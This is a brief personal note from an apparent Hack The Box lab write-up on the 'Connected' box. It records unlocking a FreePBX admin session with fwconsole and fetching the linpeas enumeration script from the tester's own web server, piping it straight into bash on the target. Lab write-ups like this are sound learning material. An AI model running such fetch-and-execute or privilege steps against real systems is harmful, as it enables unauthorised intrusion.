Pr0xximity999/Quartz/content/Personal-projects/Hack The Box/Boxes/12 Connected - Easy box.md

 looking in the server files, starting in the admin folder.

 after googling how to reset freepbx password from console, i found the command `fwconsole unlock xxx` and replace xxx with the account id displayed on the main page of the website by hitting ctrl a

+copied lineas onto the box by doing `python3 -m http.server` and then `curl -L ip:8000/linpeas.sh | bash`